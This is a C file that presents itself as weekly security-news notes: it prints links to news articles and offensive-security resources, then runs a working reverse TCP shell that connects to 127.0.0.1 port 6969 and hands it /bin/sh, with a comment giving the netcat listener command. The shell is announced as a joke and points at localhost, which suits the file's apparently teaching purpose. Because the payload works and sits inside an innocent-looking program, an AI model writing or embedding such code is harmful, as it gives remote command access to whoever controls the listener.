notes.c

/*  _____   _                __ _    ___                               _   
 * |_   _| | |_     _  _    / _` |  / __|     _ _    ___   __ __ __ __| |  
 *   | |   | ' \   | +| |   \__, | | (__     | '_|  / _ \  \ V  V // _` |  
 *  _|_|_  |_||_|   \_,_|   |___/   \___|   _|_|_   \___/   \_/\_/ \__,_|  
 *_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 
 * "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
 *
 * "Train"
 * http://patorjk.com/software/taag/
 */ 

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

void news(void);
void cheatCodes(void);
void etPhoneHome(int port, char *adr);

int main(int argc, char *argv[]) {
	news();
	cheatCodes();

	/* 0W0? What's this? */
	printf("\n\n%s\n", "Did you know this week's notes is also a Reverse TCP? ;)");
	etPhoneHome(6969, "127.0.0.1");
}

/* == N E W S == */
void news() {
	printf("%s\n\n", "== N E W S ==");

	printf("%s\n", "--> https://www.vice.com/en_us/article/43k7z3/nationwide-fake-host-scam-on-airbnb");
	printf("%s\n", "--> https://doublepulsar.com/bluekeep-exploitation-activity-seen-in-the-wild-bd6ee6e599a6");
	printf("%s\n", "--> https://twitter.com/donordrive/status/1191042822574620672");
	printf("%s\n", "--> https://www.reuters.com/article/us-facebook-cyber-whatsapp-nsogroup/whatsapp-sues-israels-nso-for-allegedly-helping-spies-hack-phones-around-the-world-idUSKBN1X82BE");
	printf("%s\n", "--> https://twitter.com/sara_rampazzi/status/1191415126630354944?s=19");
}

/* == C H E A T   C O D E S === */
void cheatCodes() {
	printf("\n\n\n%s\n\n", "== C H E A T   C O D E S ===");

	printf("%s\n", "--> https://blog.xpnsec.com/protecting-your-malware/");
	printf("%s\n", "--> https://pastebin.com/cfP7X89m");
	printf("%s\n", "--> https://github.com/notepad-plus-plus/notepad-plus-plus/issues?page=2&q=is%3Aissue+is%3Aopen");
	printf("%s\n", "--> https://github.com/momika233/ClamAV_0Day_exploit/blob/master/clamAV_0Day_exploit.py#L646");
}

/* Reverse TCP
 * https://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/
 * Server #> nc -lvp 6969
 */
void etPhoneHome(int port, char *adr) {
	struct sockaddr_in sa;
	int s;

	sa.sin_family = AF_INET;
	sa.sin_addr.s_addr = inet_addr(adr);
	sa.sin_port = htons(port);

	s = socket(AF_INET, SOCK_STREAM, 0);
	connect(s, (struct sockaddr *)&sa, sizeof(sa));
	dup2(s,0);    //std in
	dup2(s,1);    //std out
	dup2(s,2);    //std err

	execve("/bin/sh",0,0);
}

/*
* ALWAYS READ THE SOURCE!!
*────────────────────────────────┌ ─────────────────────────────────╒░░░░░░░░░░░░
*───────────────────────────── ┌  ┐ ────────────────────────────────╒░░░┘    └░░░
*─────────────────────────░─┌   ╒─ ─────────────────────────────────╒░░  ┌──   ░░
*──────   ──   ────────── ┌    ╒┬┼─╘ ───────────────────────────────╒░░  ░░░┴  ░░
*──────╘          ─╓╖╤░░░░░░══┬╔╓╒┴─╕───────────────────────────────╒░░   ░░   ░░
*       ╓  ┐───     ░░░░░░░░░░░░░╙╚╖▐                               └░░═─┌░░─╔░░░
*       ╒╕  ─  └  ┌░░░░░░░░░░░░░░░░░╙╖                               ░░─    └═░░░
*       └╙░ └╗  ┌┬░░╔░░░░░░░░░░░░░░░░░╗                              ░░░┐ ═╦─  ░░
*          ▄▓  ─╜░░░░░░░╙░░░░░░░░░░░╔╔╔╗╔╠                           ░░░─     ┌░░
*          └╘┬┌░░░░░░░░░░╠╠╩╝░░░░░╚░░░░░╩                            ░░  ┌═░░░░░░
*───────────▐░░░░░░░░░░╚╠░░░╤╗╦╥░░░╥╥╤╚╜░╔╦╩ ───────────────────────░░░┘ ┌┘   └░░
*           ▐╜░╤╙╙░░░░╦╩ └╙╦╔░░░░░░░░░╥╦╩╨                          ─░░  ░  ░  ░░
*─────────── ╫╫╦╦╦╗╦╩╩░╪╘╙▀▌╙ ┴└└╙╙╙└┴╦╦ ───────────────────────────╔░░  ═  ═  ░░
*             ╙╫╩╩▒╪░░░▐═╨         ╙  ╞╩░                           └░░═   ╔┐┌═░░
*────────────╓╦╠╩╩╫╪░░░╙              ╫╩░───────────────────────────╔░░─       ░░
*───────────└╨╩╠╩╩╠╬░░░░╦           ╥╫╩╩═───────────────────────────╒░░═╦════╦═░░
*────────────── ▐╩╩╠╚╦░░╠╔─▐▀▀▓▌ ─ ╩╫╚╩╩ ───────────────░──░─╓▄─────╒░░┘      └░░
*──────────────╓╠╫╩   └═╚   ▄──┴──┴┴╠═╨ ───────────── ╙▐  ┌  ╒└ ─╓╓─░░░  ░░░░  ░░
*────────────────└═──       ▐   ───╔░╕──────────────╒╞─   ─└    ┌▀╙─░░░  ═░░░  ░░
*──────────────┌         ┌─└─┐    ░┼░╟┐────────── ┌┘        ── ┌─░──╒░░═      ╔░░
*──────────── ┘                 └══░╔╓▐╕ ░─────╓┐             └ ────╒░░░░░░░░░░░░
*──────────── ╕┐         ┌ ╕         └╘╜┼╔┐ ─┌╠▓▓▓▄┐         ┐ ─────╒░░░░░░░░░░░░
*─────────────└╡ ╒ ─        ╙             ╙└╠▓▀▓▓▀║▓▒ ───└┌┌└───────╒░░░░░░░░░░░░
*──────────────╞┌    ╓▄─═╙┴──░             ╒╠║▓▒╢▀▌╠┘─░─────────────╒░░░░░░░░░░░░
*──────────────╓  ╓▄▓▀▄▓     ╘            ╧░│╫╦▀▒▄    ┐ ░───────────╒░░░░░░░░░░░░
*───────────────│└╦╙═▄╝▌      ╔         ╥░░░░░╚╦╨╤      ═ ░─────────╒░░░░░░░░░░░░
*─────░─  ───────░ ╤ ╢▓╓╕      ┐      ┘ ╔░░░░░╔           ┐─────────╒░░░░░░░░░░░░
*─── ─  ╛ ────────░ ▐─          ┐  ─      └─ ╒       ┐     ┐────────╒░░░░░░░░░░░░
*─┌─   ┌ ────────────╙╤          ┌          ╒                ───────╒░░░░░░░░░░░░
*╔└     ░────────────░ ╚─                  ╒         ┌     ╒ ───────╒░░░░░░░░░░░░
*─      ────────────────╘╦                ╔                ╛────────╒░░░░░░░░░░░░
*─      ────────────────┌ ╦┌             ╝─        ─┴─   ╒└─────────╒░░░░░░░░░░░░
*─     ┌──────────────────▐┬╖─         ╤┴     ──░─╒┴──┬═╙─░─────────╒░░░░░░░░░░░░
*─       ──────────────── ╨┐╨┴╓─    ╒┴┴───────┐┬╓░░═╙└──────────────╒░░░░░░░░░░░░
*─░      ─ ──────────── ╓╦╓┬─└┌─┴══┴─  ──      └    ────────────────╒░░░░░░░░░░░░
*░──        ──────────╓╫╫╩╫╬╦╦╩╗┴─          ╥ ╓╤╩╡ ─────────────────╒░░░░░░░░░░░░
*─└┬──       ─ ────╓╦╬╩╩╩╩╩╩╫░░░╙░╩╥╥╓╓╓╓╤╩┼░░░░─▐ ─────────────────╒░░░░░░░░░░░░
* ╗─┬┬┴┌─         ╒░╨╠╩╬╩╩╩╩░░░░░░░░░░░░░░░░╔░░░─▐ ─────────────────╒░░░░░░░░░░░░
*──└└═╓──────── ┌╕───╙╬╩╠╩╬╠░░░░░░╔╥░╤╤░░╩╨╚░░░╠── ─────────────────╒░░░░░░░░░░░░
* Original Art By: @theycallhimcake
*/